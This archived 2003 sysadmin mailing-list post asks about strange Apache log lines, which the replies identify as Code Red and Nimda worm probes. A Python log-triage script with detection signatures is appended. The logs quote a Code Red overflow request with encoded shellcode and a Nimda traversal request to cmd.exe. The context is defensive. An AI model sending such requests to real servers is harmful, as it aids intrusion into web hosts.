SUMMARY: Attempted hacking???

From: Mike's List <mikelist_at_sky.net>
Date: Wed Apr 16 2003 - 12:52:25 EDT

Thanks for all the replies. Most agreed that the three lines below
indicate Nimda/Code Red worms/virus, whatever, but mainly affecting
Windows running IIS.

No need to worry if running Solaris/Apache; just pay attention to the
log file not being too full.


- Mike

---------- original message ----------

My access log for Apache is full of the three lines below. Is someone
attempting to hack my web server thinking it's a Windows machine???
Solaris running Apache...

x.x.x.x - - [13/Apr/2003:21:14:23 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 164

x.x.x.x - - [13/Apr/2003:22:38:34 -0500] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -

x.x.x.x - - [13/Apr/2003:22:39:24 -0500] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -

Thanks.


- Mike
Received on Wed Apr 16 13:10:59 2003
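
The triage described in the summary above, as an added example that is not part of the original post: it counts the two probe types quoted there in an Apache access log and lists any probe that did not get an error response. The sample lines are constructed (documentation addresses, shortened payload), and the family labels follow the replies as summarized in the post.

```python
import re

# Apache common log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(.*)" (\d{3}) (\S+)$')

# Signatures built from the requests quoted in the post; labels are this
# example's own names, following the attribution given in the summary.
SIGNATURES = [
    ("code_red", re.compile(r'^GET /default\.ida\?(.)\1{20,}', re.I)),
    ("nimda", re.compile(r'^GET /scripts/.*\.\.%(?:25)?5c.*cmd\.exe', re.I)),
]

def classify(line):
    """Return (family, host, status) for a worm probe, or None otherwise."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    host, _when, request, status, _size = m.groups()
    for family, sig in SIGNATURES:
        if sig.search(request):
            return family, host, int(status)
    return None

def summarize(lines):
    """Count probes per family; collect probes answered with a non-error status."""
    counts, answered = {}, []
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue
        family, host, status = hit
        counts[family] = counts.get(family, 0) + 1
        if status < 400:  # a 2xx/3xx reply to a probe deserves a closer look
            answered.append((family, host, status))
    return counts, answered

# Constructed sample lines modelled on the three entries in the post.
SAMPLE = [
    '192.0.2.10 - - [13/Apr/2003:21:14:23 -0500] "GET /default.ida?'
    + "X" * 224 + '%u9090%u6858 HTTP/1.0" 404 164',
    '192.0.2.11 - - [13/Apr/2003:22:38:34 -0500] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -',
    '192.0.2.11 - - [13/Apr/2003:22:39:24 -0500] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -',
    '192.0.2.20 - - [13/Apr/2003:22:40:01 -0500] "GET /index.html HTTP/1.0" 200 1043',
]

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

An empty second list means every probe was refused, which matches the 404 responses in the quoted log.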
